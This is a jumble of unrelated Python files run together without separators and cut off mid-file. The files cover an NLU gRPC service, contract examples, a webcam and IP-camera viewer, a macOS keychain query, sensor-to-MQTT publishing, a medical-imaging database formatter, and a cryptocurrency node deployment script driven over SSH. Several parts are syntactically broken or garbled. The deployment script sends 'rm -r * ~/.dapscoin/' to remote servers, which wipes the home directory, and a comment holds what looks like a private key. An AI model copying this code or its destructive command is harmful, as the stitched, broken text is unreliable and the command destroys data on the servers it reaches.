self.trigger_handlers[found_trigger](response, message, found_trigger, found_triggers) if new_response: if not new_response.response_id == response.response_id: return new_response for found_trigger in found_triggers: SingleMessageHandler.substitute_pattern_in_message(message, found_trigger, "") self.quicksend_to_api(response, message, j) if not len(response.query_result.fulfillment_messages): self.quicksend_to_api(response, None, 0) return response def quicksend_to_api( self, response: session_pb2.DetectIntentResponse, message: Optional[intent_pb2.Intent.Message], count: int ) -> None: logger_console.warning({"message": "quicksend_to_api not written, please subclass and implement"}) @Timer(log_arguments=False, recursive=True) def process_intent_handler( self, cai_response: session_pb2.DetectIntentResponse ) -> session_pb2.DetectIntentResponse: intent_name = cai_response.query_result.intent.display_name handler: Optional[Callable] = self.intent_handlers.get(intent_name) if handler is not None: cai_response = handler(cai_response) text = [i.text.text for i in cai_response.query_result.fulfillment_messages] logger_console.warning( { "message": f"BPI-DetectIntentResponse from BPI with text: {text}", "content": text, "text": text, "tags": ["text", "clean"], } ) return cai_response class BpiUsersServices(AutoUsersServicer): __metaclass__ = ABCMeta @property @abstractmethod def client(self) -> NLUClient: pass def Login(self, request: user_pb2.LoginRequest, context: grpc.ServicerContext) -> user_pb2.LoginResponse: logger_console.info("login request handled by bpi") return user_pb2.LoginResponse(auth_token=self.client.services.users.metadata[0][1]) class BpiContextServices(AutoContextsServicer): __metaclass__ = ABCMeta @property @abstractmethod def client(self) -> NLUClient: pass def CreateContext( self, request: context_pb2.CreateContextRequest, context: grpc.ServicerContext ) -> context_pb2.Context: logger_console.info("passing create context request on to CAI") return self.client.services.contexts.create_context(request=request) class BpiAgentsServices(AutoAgentsServicer): __metaclass__ = ABCMeta @property @abstractmethod def client(self) -> NLUClient: pass class BpiEntityTypeServices(AutoEntityTypesServicer): __metaclass__ = ABCMeta @property @abstractmethod def client(self) -> NLUClient: pass class BpiAiServicesServices(AutoAiServicesServicer): __metaclass__ = ABCMeta @property @abstractmethod def client(self) -> NLUClient: pass class BpiIntentsServices(AutoIntentsServicer): __metaclass__ = ABCMeta @property @abstractmethod def client(self) -> NLUClient: pass class BpiProjectRolesServices(AutoProjectRolesServicer): __metaclass__ = ABCMeta @property @abstractmethod def client(self) -> NLUClient: pass examples/index_of.py1-10 # built-in from typing import List # external import pytest # project import deal # if you have more than 2-3 contracts, # consider moving them from decorators into separate variable # like this: contract_for_index_of = deal.chain( # result is an index of items deal.post(lambda result: result >= 0), deal.ensure(lambda items, item, result: result < len(items)), # element at this position matches item deal.ensure( lambda items, item, result: items[result] == item, message='invalid match', ), # element at this position is the first match deal.ensure( lambda items, item, result: not any(el == item for el in items[:result]), message='not the first match', ), # LookupError will be raised if no elements found deal.raises(LookupError), deal.reason(LookupError, lambda items, item: 
item not in items), # no side-effects deal.has(), ) @contract_for_index_of def index_of(items: List[int], item: int) -> int: for index, el in enumerate(items): if el == item: return index raise LookupError @pytest.mark.parametrize('case', deal.cases(index_of)) def test_index_of(case): case() from django.urls import path from . import views app_name = 'home' urlpatterns = [ path('search/', views.search, name='search'), ] import numpy as np import cv2 import time from time import monotonic as chrono from reolinkapi import Camera import threading from constants import * # code to open the webcam def get_video_feed(): cv2.namedWindow("preview") vc = cv2.VideoCapture(0) while True: # Capture frame-by-frame ret, frame = vc.read() # Our operations on the frame come here gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) # Display the resulting frame cv2.imshow('frame', gray) if cv2.waitKey(1) & 0xFF == ord('q'): break # When everything done, release the capture vc.release() cv2.destroyWindow("preview") def save_video(time_limit=10): cap = cv2.VideoCapture(0) # Define the codec and create VideoWriter object fourcc = cv2.VideoWriter_fourcc(*'XVID') out = cv2.VideoWriter('output.avi', fourcc, 20.0, (640, 480)) end_time = chrono() + time_limit while cap.isOpened() and chrono() < end_time: ret, frame = cap.read() if ret: out.write(frame) cv2.imshow('frame', frame) if cv2.waitKey(1) & 0xFF == ord('q'): break else: break # Release everything if job is finished cap.release() out.release() cv2.destroyAllWindows() return def extract_frames(path_out, frame_rate=1, time_limit=10): """ Parameters ---------- path_out: str, path to save the frames time_limit: float, optional time to record in seconds, default 10 frame_rate: int or float, optional Extract the frame every "frame_rate" seconds, default 1 Returns ------- """ count = 0 vc = cv2.VideoCapture(0) success, image = vc.read() success = True end_time = chrono() + time_limit while success and chrono() < end_time: vc.set(cv2.CAP_PROP_POS_MSEC, (count * 1000)) success, image = vc.read() cv2.imwrite(path_out + "/frame%d.jpg" % count, image) count += frame_rate def non_blocking(IP, name): print("calling non-blocking") def inner_callback(img): cv2.imshow(name, maintain_aspect_ratio_resize(img, width=600)) print("got the image non-blocking") key = cv2.waitKey(1) if key == ord('q'): cv2.destroyAllWindows() exit(1) c = Camera(IP, CAMERA_USER, CAMERA_PSWD) # t in this case is a thread t = c.open_video_stream(callback=inner_callback) print(t.is_alive()) while True: if not t.is_alive(): print("continuing") break # stop the stream # client.stop_stream() # Reolink api def blocking(IP, name): c = Camera(IP, CAMERA_USER, CAMERA_PSWD) # stream in this case is a generator returning an image (in mat format) stream = c.open_video_stream() # using next() # while True: # img = next(stream) # cv2.imshow("name", maintain_aspect_ratio_resize(img, width=600)) # print("got the image blocking") # key = cv2.waitKey(1) # if key == ord('q'): # cv2.destroyAllWindows() # exit(1) # or using a for loop for img in stream: cv2.imshow(name, maintain_aspect_ratio_resize(img, width=600)) # cv2.imshow("name", img) # print("got the image blocking") key = cv2.waitKey(1) if key == ord('q'): cv2.destroyAllWindows() exit(1) # Resizes a image and maintains aspect ratio def maintain_aspect_ratio_resize(image, width=None, height=None, inter=cv2.INTER_AREA): # Grab the image size and initialize dimensions dim = None (h, w) = image.shape[:2] # Return original image if no need to resize # if width is None and 
height is None: # return image # We are resizing height if width is none if width is None: if height is None: return image # Calculate the ratio of the height and construct the dimensions r = height / float(h) dim = (int(w * r), height) # We are resizing width if height is none # else: # Calculate the ratio of the 0idth and construct the dimensions r = width / float(w) dim = (width, int(h * r)) # Return the resized image return cv2.resize(image, dim, interpolation=inter) if __name__ == '__main__': # blocking(CAMERA_IP) # blocking(CAMERA_IP_2) threads = [] for i in range(3): t = threading.Thread(target=non_blocking(CAMERA_IP_LST[i], "cam" + str(i+1))) t.daemon = True threads.append(t) for i in range(3): threads[i].start() # for i in range(3): # threads[i].join() Examples/Scripts/test.py1-10 import array import Security status, kc = Security.SecKeychainOpen('~/Library/Keychains/login.keychain', None) if status: raise Exception('Couldnt open keychain') status, settings = Security.SecKeychainCopySettings(kc, None) if status: raise Exception('Couldnt get settings') print(settings) status, searchList = Security.SecKeychainCopyDomainSearchList(Security.kSecPreferencesDomainUser, None) if status: raise Exception('Couldnt get user domain search list') print(searchList) # for sl in searchList: # path_len = 1024 # #path_buf = array.array('c','\0'*path_len) # path_buf = "" # status, path_len, path_buf = Security.SecKeychainGetPath(sl, path_len, path_buf) # print(path_buf[:path_len].tostring()) # status, access = Security.SecKeychainCopyAccess(kc, None) # if status != 0: # errMsg = Security.SecCopyErrorMessageString(status, None) # raise Exception('Couldnt copy access: {}'.format(errMsg)) # # print(access) # status, kcstatus = Security.SecKeychainGetStatus(kc, None) # if status: # raise Exception('Cant get status') # # print(kcstatus) status, result = Security.SecItemCopyMatching({ Security.kSecClass: Security.kSecClassCertificate, Security.kSecMatchLimit: Security.kSecMatchLimitAll }, None) print(result) 0 # rpi-arduino-dht11 # Raspberry Pi reads temperature and humidity sensor data from Arduino import serial, string, time from serial import Serial import paho.mqtt.publish as publish # In this example /dev/ttyUSB0 is used # This may change in your case to /dev/ttyUSB1, /dev/ttyUSB2, etc. 
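# A minimal consumer-side sketch (not part of the original script), assuming
# the paho-mqtt 1.x callback API: it subscribes to the same "Sensors" topic
# that this script publishes to and prints each payload as it arrives. The
# function is defined but never called here, so it does not interfere with
# the publishing loop below; the name _demo_subscribe is illustrative only.
import paho.mqtt.client as mqtt

def _demo_subscribe(host="localhost", topic="Sensors"):
    def on_message(client, userdata, msg):
        # msg.payload carries the str(data) list published by the loop below
        print(msg.topic, msg.payload.decode('utf-8'))

    subscriber = mqtt.Client()
    subscriber.on_message = on_message
    subscriber.connect(host, 1883, 60)
    subscriber.subscribe(topic)
    subscriber.loop_forever()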
ser = serial.Serial('/dev/ttyACM0', 9600) # MQTT declaration part MQTT_SERVER = "localhost" MQTT_PATH = "Sensors" # The following block of code works like this: # If serial data is present, read the line, decode the UTF8 data, # ...remove the trailing end of line characters # ...split the data into temperature and humidity # ...remove the starting and ending pointers (< >) # ...print the output while True: if ser.in_waiting > 0: rawserial = ser.readline() cookedserial = rawserial.decode('utf-8').strip('\r\n') datasplit = cookedserial.split(',') temperature = datasplit[0].strip('<') temperature = int(float(temperature)) Gaslevel = int(datasplit[1]) Ldr = int(datasplit[2]) Piezo = int(datasplit[3]) hic = int(datasplit[4]) humidity = datasplit[5].strip('>') humidity = int(float(humidity)) flame = int(datasplit[6]) co2 = int(datasplit[7].strip('>')) print(temperature) print(Gaslevel) print(Ldr) print(Piezo) print(hic) print(humidity) print(flame) print(co2) data = [temperature, Gaslevel, Ldr, Piezo, hic, humidity, flame, co2] payload = str(data) publish.single(MQTT_PATH, payload, hostname=MQTT_SERVER) time.sleep(1) syd/syd_tabular.py #!/usr/bin/env python3 import datetime import colored import os import syd import re from tokenize import tokenize, NUMBER from io import BytesIO from box import Box, BoxKeyError, BoxList from functools import reduce from operator import attrgetter from string import Formatter # ----------------------------------------------------------------------------- def tabular_get_line_format(db, table_name, format_name, element): ''' Retrieve the line format from the format name to build a tabluar ''' table_name = syd.guess_table_name(db, table_name) formats = syd.find(db['PrintFormat'], table_name=table_name) df = None ff = None for f in formats: if f.name == format_name: df = f.format ff = f if df == None and format_name != 'raw': s = "Cannot find the format '" + format_name + "' in table '" + table_name + "' using 'raw'" syd.warning(s) format_name = 'raw' if format_name == 'raw': df = '' for k in element: df += '{' + str(k) + '} ' sorting_key = '' if ff: if 'sorting_key' in ff: sorting_key = ff.sorting_key return df, sorting_key # ----------------------------------------------------------------------------- def get_nested_info(db, field_name): fields = field_name.split('.') # re.findall(r'(\w)\.(\w)', field_name) a = Box() a.table_names = [] a.tables = [] a.field_id_names = [] a.field_format_name = '' for f in fields[0:-1]: tname = syd.guess_table_name(db, f) if tname in db: table = db[tname] else: table = None a.table_names.append(tname) a.tables.append(table) a.field_id_names.append(f + '_id') a.field_format_name += f + '->' a.field_format_name += fields[-1] a.field_name = fields[-1] a.initial_field_name = field_name return a # ----------------------------------------------------------------------------- def get_sub_element(db, element, tables, field_id_names): se = element for table, field_id in zip(tables, field_id_names): if table: se = syd.find_join_one(se, table, field_id) else: return None return se # ----------------------------------------------------------------------------- def get_sub_elements(db, elements, format_info, subelements): # format_info.field_format_name, # study->patient->name # format_info.tables, # DicomStudy Patient # format_info.field_id_names, # study_id patient_id # format_info.field_name) # name # get al subelements current_table = format_info.tables[0] current_field_id_name = format_info.field_id_names[0] ids = 
[elem[current_field_id_name] for elem in subelements] ## repetition, unique ? FIXME new_subelements = syd.find(current_table, id=ids) if len(format_info.tables) == 1: # correspondance current_id -> new_id subelements_map = {} for s in new_subelements: try: subelements_map[s.id] = s[format_info.field_name] except: subelements_map[s.id] = '?' for elem in elements: index = elem[format_info.field_format_name] if index: # because can be None elem[format_info.field_format_name] = subelements_map[index] else: elem[format_info.field_format_name] = '?' return elements # correspondance current_id -> new_id subelements_map = {} for s in new_subelements: subelements_map[s.id] = s[format_info.field_id_names[1]] # change the id for elem in elements: index = elem[format_info.field_format_name] if index: elem[format_info.field_format_name] = subelements_map[index] # recurse removing the first format_info.tables = format_info.tables[1:] format_info.field_id_names = format_info.field_id_names[1:] return get_sub_elements(db, elements, format_info, new_subelements) # ----------------------------------------------------------------------------- def get_all_nested_info(db, line_format): subelements = re.findall(r'{(\w+)\.(.*?)[:\}]', line_format) nesteds = [] for e in subelements: a = get_nested_info(db, e[0] + '.' + e[1]) nesteds.append(a) return nesteds # ----------------------------------------------------------------------------- def tabular_add_nested_elements(db, table_name, elements, line_format): # get information about all nesteds (such as patient->name fields_info = syd.get_all_nested_info(db, line_format) for sub in fields_info: for elem in elements: elem[sub.field_format_name] = elem[sub.field_id_names[0]] ## FIRST TIME ONLY se = get_sub_elements(db, elements, sub, elements) for sub in fields_info: line_format = line_format.replace(sub.initial_field_name, sub.field_format_name) return line_format # ----------------------------------------------------------------------------- def tabular_add_special_fct(db, table_name, elements, line_format): subelements = re.findall(r'{(.*?)[:\}]', line_format) for sub in subelements: if sub == 'abs_filename': tabular_add_abs_filename(db, table_name, elements) if sub == 'time_from_inj': tabular_add_time_from_inj(db, table_name, elements) if sub == 'nb_dicom_files': tabular_add_nb_dicom_files(db, table_name, elements) # ----------------------------------------------------------------------------- def tabular_add_abs_filename(db, table_name, elements): # only for image, dicomstudy, dicomseries, dicomfile # image -> file_mhd_id file_raw_id => file # study -> NO # series -> => dicomfile => file_id ; several so only first one or all ? 
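    # Each branch below applies the same join pattern: 1) collect the
    # foreign-key ids from `elements`, 2) fetch the referenced rows with one
    # syd.find() call, 3) build an id -> row dict and resolve every element
    # through it, falling back to 'file_does_not_exist' when a lookup fails.
    # The DicomSeries branch applies it twice (DicomSeries -> DicomFile ->
    # File); note that it indexes map_f (keyed by File.id) with df.id, where
    # df.file_id looks like the intended key.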
if table_name == 'DicomSeries': ids = [e.id for e in elements] dicomfiles = syd.find(db['DicomFile'], dicom_series_id=ids) ids = [df.file_id for df in dicomfiles] files = syd.find(db['File'], id=ids) map_df = {df.dicom_series_id: df for df in dicomfiles} # keep only one map_f = {f.id: f for f in files} # keep only one for e in elements: try: df = map_df[e.id] f = map_f[df.id] e['abs_filename'] = syd.get_file_absolute_filename(db, f) except: e['abs_filename'] = 'file_does_not_exist' # print('warning, cannot find', e.id, df.id) if table_name == 'DicomFile': ids = [e.file_id for e in elements] files = syd.find(db['File'], id=ids) map_f = {f.id: f for f in files} for e in elements: try: f = map_f[e.file_id] e['abs_filename'] = syd.get_file_absolute_filename(db, f) except: e['abs_filename'] = 'file_does_not_exist' # print('warning, cannot find', e.id, df.id) if table_name == 'Image': ids = [e.file_mhd_id for e in elements] files = syd.find(db['File'], id=ids) map_f = {f.id: f for f in files} for e in elements: try: f = map_f[e.file_mhd_id] e['abs_filename'] = syd.get_file_absolute_filename(db, f) except: e['abs_filename'] = 'file_does_not_exist' # print('warning, cannot find', e.id, df.id) # ----------------------------------------------------------------------------- def tabular_add_nb_dicom_files(db, table_name, elements): if table_name != 'DicomSeries': return for e in elements: dicomfiles = syd.find(db['DicomFile'], dicom_series_id=e.id) e['nb_dicom_files'] = len(dicomfiles) # ----------------------------------------------------------------------------- def tabular_add_time_from_inj(db, table_name, elements): if table_name != 'DicomSeries' and table_name != 'Image': return ids = [e.injection_id for e in elements] injections = syd.find(db['Injection'], id=ids) map_inj = {inj.id: inj for inj in injections} # keep only one for e in elements: if not e.injection_id in map_inj: continue inj = map_inj[e.injection_id] date1 = inj.date date2 = e.acquisition_date # print(date1, date2) e.time_from_inj = date2 - date1 # ----------------------------------------------------------------------------- def get_field_value(field_name, mapping): ''' http://ashwch.github.io/handling-missing-keys-in-str-format-map.html To handle missing field in tabular_str ''' try: if '.' not in field_name: return mapping[field_name], True else: obj, attrs = field_name.split('.', 1) return attrgetter(attrs)(mapping[obj]), True except Exception as e: return field_name, False # ----------------------------------------------------------------------------- def str_format_map(format_string, mapping): ''' http://ashwch.github.io/handling-missing-keys-in-str-format-map.html To handle missing field in tabular_str ''' f = Formatter() parsed = f.parse(format_string) output = [] for literal_text, field_name, format_spec, conversion in parsed: conversion = '!' + conversion if conversion is not None else '' format_spec = ':' + format_spec if format_spec else '' if field_name is not None: field_value, found = get_field_value(field_name, mapping) if not found or field_value == '?': text = '?' else: format_string = '{{{}{}}}'.format(conversion, format_spec) if not field_value: text = '?' 
else: text = format_string.format(field_value) output.append(literal_text + text) text = '' return ''.join(output) # ----------------------------------------------------------------------------- def tabular_str(format_line, elements): ''' Dump some elements with a tabular ''' # check try: # t = format_line.format_map(SafeKey(d)) t = str_format_map(format_line, elements[0]) except BoxKeyError as err: s = "Error while formating " + str(err) + " probably does not exist in this table" raise_except(s) s = '' for e in elements: # s += format_line.format_map(d) s += str_format_map(format_line, e) + '\n' # remove last element (final break line) s = s[:-1] return s # ----------------------------------------------------------------------------- def grep_elements_old(elements, format_line, grep): ''' Filter elements. Only keep the ones that match grep ''' lines = [syd.str_format_map(format_line, elem) for elem in elements] s = '' if len(grep) == 0: for l in lines: s += l + '\n' if len(s) > 0: s = s[:-1] # remove last break line return elements, s for g in grep: vgrep = False kelements = [] klines = [] if g[0] == '%': vgrep = True g = g[1:] for e, l in zip(elements, lines): if re.search(g, l): if not vgrep: kelements.append(e) klines.append(l) else: if vgrep: kelements.append(e) klines.append(l) elements = kelements lines = klines for l in lines: s += l + '\n' if len(s) > 0: s = s[:-1] # remove last break line return elements, s # ----------------------------------------------------------------------------- def grep_elements(elements, grep): """ Filter elements. Only keep the ones that match grep """ res = [] for e in elements: keep_it = True for g in grep: s = ' '.join(str(v) for v in e.values()) if s.find(g) == -1: keep_it = False if keep_it: res.append(e) return res # ----------------------------------------------------------------------------- def grep(db, table_name, elements, line_format_name='default', grep=[]): ''' Simple print/grep helper function ''' if len(elements) < 1: return elements, '' # Get line format line_format, sorting_key = syd.tabular_get_line_format(db, table_name, line_format_name, elements[0]) # add nested elements lf = syd.tabular_add_nested_elements(db, table_name, elements, line_format) syd.tabular_add_special_fct(db, table_name, elements, line_format) # perform grep elements, s = syd.grep_elements(elements, lf, grep) # return return elements, s print('Starting script') from time import sleep from pexpect import pxssh import configparser from config import args, ssh, send, sendFile, disconnect, config as s from subprocess import call, Popen, PIPE, STDOUT from getpass import getpass def status(servers = s['servers']): for server in servers: print '\033[94m'+server['name']+' - '+server['address']+'\033[0m' try: connect = ssh(server) if connect: print '\033[92m'+send(connect, 'uptime')+'\033[0m' if (s['main']['name']==server['name']): #status checks for main server res = send(connect, "ps -e|grep mongo") if (len(res)>21): print '\033[92m'+res+'\033[0m' else: print '\033[91m'+res+'\nNo mongo service detected\033[0m' res = send(connect, "ps -e|grep node") if (len(res)>21): print '\033[92m'+res+'\033[0m' server['mongodown']=True else: print '\033[91m'+res+'\nNo node service detected\033[0m' server['nodedown']=True send(connect, 'dapscoin-cli '+s['serveroption']+'status') disconnect(connect) call('ping -c 1 '+server['address'], shell=True) else: send(connect, 'dapscoin-cli '+s['serveroption']+' masternode status') send(connect, 'dapscoin-cli '+s['serveroption']+' getbalance') 
disconnect(connect) print("\n\n") sleep(2) else: server['down']=True except pxssh.ExceptionPxssh, err: print str(err) # def stop(): # for server in s['servers']: # print 'wip' def stopAllWalletDaemons(servers=s['servers']): for server in servers: stopAWallet(server) def stopAWallet(server): connect = ssh(server) if connect: print("Trying to stop daemon:" + server['name'] + "\n") send(connect, 'dapscoin-cli '+s['serveroption']+' stop') sleep(2) #wait 2 seconds disconnect(connect) def startStakingWallets(servers, hard=False): for server in servers: startStakingWallet(server, hard) def startStakingWallet(server, hard=False):#Main server producing PoW blocks, hard=true meaning to erase block data and restart wallet if hard: removeBlockchainData(s['main']) genStakingnodeConfigs(s['servers'], s['main']) connect = ssh(server) if connect: send(connect, 'dapscoind '+s['serveroption']+' -daemon')#Start daemon sleep(2) #wait 2 seconds if server['address'] == s['main']['address']:#Start generating PoW blocks send(connect, 'dapscoin-cli '+s['serveroption']+' setgenerate true 1') #if hard: #Need to reindex explorer database disconnect(connect) def removeBlockDataFromServers(servers=s['servers']): for server in servers: removeBlockchainData(server) def removeBlockchainData(server): connect = ssh(server) if connect: send(connect, 'rm -r * ~/.dapscoin/') disconnect(connect) def startStakingServers(servers=s['servers']): for server in servers: startStaking(server) def startStaking(server): connect = ssh(server) if connect: result = send(connect, 'dapscoin-cli '+s['serveroption']+'getstakingstatus') print result if ((result.find('false')!=-1) or (result.find("couldn't")!=-1)): send(connect, 'dapscoind '+s['serveroption']+'stop') print "Waiting for 30 seconds..." sleep(30) send(connect, 'dapscoind '+s['serveroption']+' -daemon') send(connect, 'dapscoin-cli '+s['serveroption']+'') #unlock wallet disconnect(connect) def masternodeScript(stakingserver, masterservers=s['masterservers']): genStakingNodeConfigFileScript(masterservers, stakingserver) connect = ssh(stakingserver) if connect: send(connect, 'dapscoind '+s['serveroption']+'-daemon') key = send(connect, 'dapscoin-cli '+s['serveroption']+'masternode genkey') if ((key[0].lower().find('not')==-1) and (key[0].lower().find('error')==-1)): for server in masterservers: genMasternodeConfigFileScript(server, stakingserver, key) else: print('could not complete process') def genMasternodeConfigFileScript(masterserver, stakingserver, nodeprivkey): dapsConfData = open('boot/config/dapscoin.conf', 'r').read()+'externalip='+masterserver['address']+'\nmasternodeprivkey='+nodeprivkey connect = ssh(masterserver) if connect: send(connect, 'mkdir ~/.dapscoin') send(connect, 'touch ~/.dapscoin/dapscoin.conf') send(connect, 'echo "'+dapsConfData+'">~/.dapscoin/dapscoin.conf') send(connect, 'dapscoin-cli '+s['serveroption']+'-daemon -connect '+stakingserver['address']) sleep(5) send(connect, 'dapscoin-cli '+s['serveroption']+'masternode genkey') disconnect(connect) def genStakingnodeConfigs(stakingservers=s['stakingnodes'], masterservers=s['masternodes']): for server in stakingservers: genStakingNodeConfigFileScript(server, masterservers) def genStakingNodeConfigFileScript(stakingserver, masterservers=s['masternodes']): nodes = '' for server in masterservers: nodes += 'addnode='+server['address']+'\n' dapsConfData = open('boot/config/dapscoin.conf', 'r').read() + nodes connect = ssh(stakingserver) if connect: send(connect, 'mkdir ~/.dapscoin') send(connect, 'touch 
~/.dapscoin/dapscoin.conf') send(connect, 'echo "'+dapsConfData+'">~/dapscoin/dapscoin.conf') disconnect(connect) def restartAllWallets(hard=False, masternode=s['masternodes'][0]):#hard restart = erase data and start blockchain from beginning stopAllWalletDaemons() if hard: for server in s['servers']: removeBlockchainData(server) startStakingWallet(s['main']) print('Wait 10s for a number of PoW blocks generated\n') sleep(10) #start control wallet that controls the first masternode, this assume the machine running #this script is running control wallet mn1ip = masternode['address'] if hard: #1. Stop control wallet p = Popen('dapscoin-cli ' + s['serveroption'] + " stop", shell=True, stdout=PIPE, stderr=STDOUT) for line in p.stdout.readlines(): print line, sleep(2) #2. Start daemon Popen('dapscoind ' + s['serveroption'] + " -daemon", shell=True, stdout=PIPE, stderr=STDOUT) sleep(2) #3. generate masternodeprivatekey p = Popen('dapscoin-cli ' + s['serveroption'] + " masternode genkey", shell=True, stdout=PIPE, stderr=STDOUT) lines = p.stdout.readlines() mnprivateKey = lines[0] mnalias = "masternode1" #4. generate account p = Popen('dapscoin-cli ' + s['serveroption'] + " getaccountaddress " + mnalias, shell=True, stdout=PIPE, stderr=STDOUT) lines = p.stdout.readlines() accountAddress = lines[0] #5. send 10 000 daps to accountaddress txhash = transferFromMainWallet(accountAddress) if txhash: #check whether the transaction is confirmed confirmed = False while not confirmed: print('Checking tx masternode send confirmation\n') p = Popen('dapscoin-cli ' + s['serveroption'] + " masternode outputs", shell=True, stdout=PIPE, stderr=STDOUT) lines = p.stdout.readlines() if txhash in str(lines): confirmed = True else: print('cannot send daps to masternode') return 0 #6. create masternode.conf file mn1port = '53572' mnconfPath = '~/.dapscoin/masternode.conf' if s['serveroption'] == '-testnet': mn1port = '53575' mnconfPath = '~/.dapscoin/testnet4/masternode.conf' mnconfContent = mnalias + ' ' + mn1ip + ':' + mn1port + ' ' + mnprivateKey + ' ' + txhash + ' 1' Popen('echo "' + mnconfContent + '" >' + mnconfPath, shell=True, stdout=PIPE, stderr=STDOUT) #7. Start masternode daemon startStakingWallet(masternode, hard) stopAWallet(masternode) nodes = '' for server in s['servers']: nodes += '\naddnode='+server['address'] dapsConfData = open('boot/config/dapscoin.conf', 'r').read() + nodes dapsConfData = dapsConfData + '\n' + 'masternode=1\n' + 'externalip=' + mn1ip + '\nmasternodeprivkey=' + mnprivateKey mn1Connect=ssh(masternode) if mn1Connect: send(mn1Connect, 'echo "'+dapsConfData+'">~/dapscoin/dapscoin.conf') send(mn1Connect, 'dapscoind '+s['serveroption']+' -daemon')#Start daemon disconnect(mn1Connect) #8. Start masternode from control wallet p = Popen('dapscoin-cli ' + s['serveroption'] + ' startmasternode alias false ' + mnalias, shell=True, stdout=PIPE, stderr=STDOUT) lines = p.stdout.readlines() if 'Successfully started 1' in str(lines): print('Sucessfully start control wallet masternode\n') else: print('Failed to start control wallet masternode\n') return 0 #9. Start masternode in VPS res = send(mn1Connect, 'dapscoin-cli '+s['serveroption']+' startmasternode local false')#Start daemon print(res + '\n') #10. Start staking nodes... 
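#Illustrative helper (not part of the original script): it wraps the Popen
#pattern used repeatedly above -- run a local dapscoin-cli command and return
#the first line of its output. The name run_cli_first_line is hypothetical.
def run_cli_first_line(command):
    p = Popen(command, shell=True, stdout=PIPE, stderr=STDOUT)
    lines = p.stdout.readlines()
    p.wait()
    return lines[0].strip() if lines else ''

#e.g. mnprivateKey = run_cli_first_line('dapscoin-cli ' + s['serveroption'] + ' masternode genkey')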
#transfer funds to specified destination def transferFromMainWallet(destination, amount = s['coinamount']): main = s['main'] connect = ssh(main) if connect: response = send(connect, 'dapscoin-cli ' + s['serveroption'] + ' sendtoaddress ' + destination + ' ' + amount) if response: txhash = response[0] return txhash disconnect(connect) #restart specified servers def reboot(servers = s['servers']): for server in servers: connect = ssh(server) if connect: send(connect, 'sudo reboot') send(connect, getpass()) disconnect(connect) sleep(60) for server in servers: connect = ssh(server) if connect: send(connect, 'dapscoind') #transfer and install binary files from local machine to all specified servers def installBinToServers(pathtobin, servers=s['servers']): success = [] for server in servers: success.append(installbinaries(server, pathtobin)) return all(success) #transfer and install binary files from local machine to specified server def installbinaries(server, pathtobin): sendFile(server, pathtobin+'dapscoind.bin '+pathtobin+'dapscoincli.bin', '/usr/bin/') connect = ssh(server) if connect: send(connect, 'cd /usr/bin/') send(connect, 'rm dapscoind dapscoin-cli') send(connect, 'mv dapscoind.bin dapscoind') send(connect, 'mv dapscoin-cli.bin dapscoin-cli') disconnect(connect) return 1 else: return 0 # def transfer(masternode, worker, amount=s['coinamount'] ): # connect = ssh(masternode) # send(connect, 'dapscoind')#needs to connect # send(connect, 'dapscoin-cli '+s['serveroption']+'masternode genkey') # coinAddress = send(connect,'dapscoin-cli '+s['serveroption']+'getaccountaddress'+s['alias'])#what is alias? # print coinAddress # disconnect(connect) # connect = ssh(worker) # send(connect, 'dapscoin-cli '+s['serveroption']+'sendtoaddress '+coinAddress+amount) # disconnect(connect) # connect = ssh(masternode) # send(connect, 'dapscoin-cli '+s['serveroption']+'getbalance') def awaitWorkers(workers, amount=s['coinamount']): ready = False while (not ready): ready = True for worker in workers: connect = ssh(worker) balance = send(connect, 'dapscoin-cli '+s['serveroption']+'getbalance') if (balance1): transferFromMainWallet(arg['alt'][0], arg['alt'][1]) else: transferFromMainWallet(arg['alt'][0]) if (arg['k'].find('restartwallet')!=-1): restartAllWallets(arg['hard']) if (arg['k'].find('stopdaemon')!=-1): if (len(arg['v'])): stopAllWalletDaemons(arg['v']) else: stopAllWalletDaemons() if (arg['k'].find('start')!=-1): startStakingWallets(arg['v'], arg['hard']) if (arg['k'].find('genstakingconfig')!=-1): genStakingNodeConfigFileScript(arg['v']) if (arg['k'].find('inst')!=-1): if (len(arg['alt'])): if (len(arg['v'])): installBinToServers(arg['alt'][0],arg['v']) else: installBinToServers(arg['alt'][0]) else: print "Could not install binaries. Please provide a source path." 
runArgs() print args #sendFile(s['main'], 'test.test', '/home/dapstest/') #sendFile(s['main'], 'boot/', '/home/dapstest/','-r') #genConfigFileScript(s['masternodes'][0],'92zcRZrsy2JJjuY9kXGA4n7jSihfjGzrjKwB4s4Mq4UG42NPgBe', '172.16.31.10') #masternodeScript(s['masternodes'],s['stakingnodes'][0]) aliyun/api/rest/Ecs20130110ReleasePublicIpAddressRequest.py0 ''' Created by auto_sdk on 2015.10.09 ''' from aliyun.api.base import RestApi class Ecs20130110ReleasePublicIpAddressRequest(RestApi): def __init__(self,domain='ecs.aliyuncs.com',port=80): RestApi.__init__(self,domain, port) self.InstanceId = None self.PublicIpAddress = None def getapiname(self): return 'ecs.aliyuncs.com.ReleasePublicIpAddress.2013-01-10' import os import subprocess import json class Colors: HEADER = '\033[95m' OKBLUE = '\033[94m' OKCYAN = '\033[96m' OKGREEN = '\033[92m' WARNING = '\033[93m' FAIL = '\033[91m' ENDC = '\033[0m' BOLD = '\033[1m' UNDERLINE = '\033[4m' def is_exist(path: str): return os.path.isfile(path) if __name__ == "__main__": print(Colors.HEADER + Colors.BOLD + "Begin functional tests" + Colors.ENDC) directories = next(os.walk("."))[1] directories.reverse() args = ["--enable-logger"] if is_exist("../../cmake-build-debug/naobi"): args.insert(0, "../../cmake-build-debug/./naobi") else: args.insert(0, "../../build/./naobi") for directory in directories: args.append(directory + "/main.naobi") process = subprocess.Popen(args, stdout=subprocess.PIPE, stdin=subprocess.PIPE) if process.returncode != 1 and is_exist(directory + "/scenario.json"): f = open(directory + "/scenario.json") scenarios = json.loads(f.read()) for count, scenario in enumerate(scenarios): if len(scenario["in"]) != 0: process.stdin.write(bytes(scenario["in"] + '\n', "UTF-8")) process.stdin.flush() if scenario["out"] == "": continue test = process.stdout.readline().decode().replace('\n', '') if test != scenario["out"]: print(Colors.FAIL + Colors.BOLD + "Test " + directory + " failed!\nExpected '" + str(scenario["out"]) + "' got '" + str(test) + "' in scenario " + str(count + 1)) exit(1) process.wait() if process.returncode != 0: print(Colors.FAIL + Colors.BOLD + "Test " + directory + " failed!" + Colors.ENDC) exit(1) else: print(Colors.OKGREEN + Colors.BOLD + "Test " + directory + " passed!" + Colors.ENDC) print() print(Colors.OKGREEN + Colors.BOLD + "All tests passed!" + Colors.ENDC) giosumarin/sHAMsHAM_package/sHAM/huffman.py from heapq import heappush, 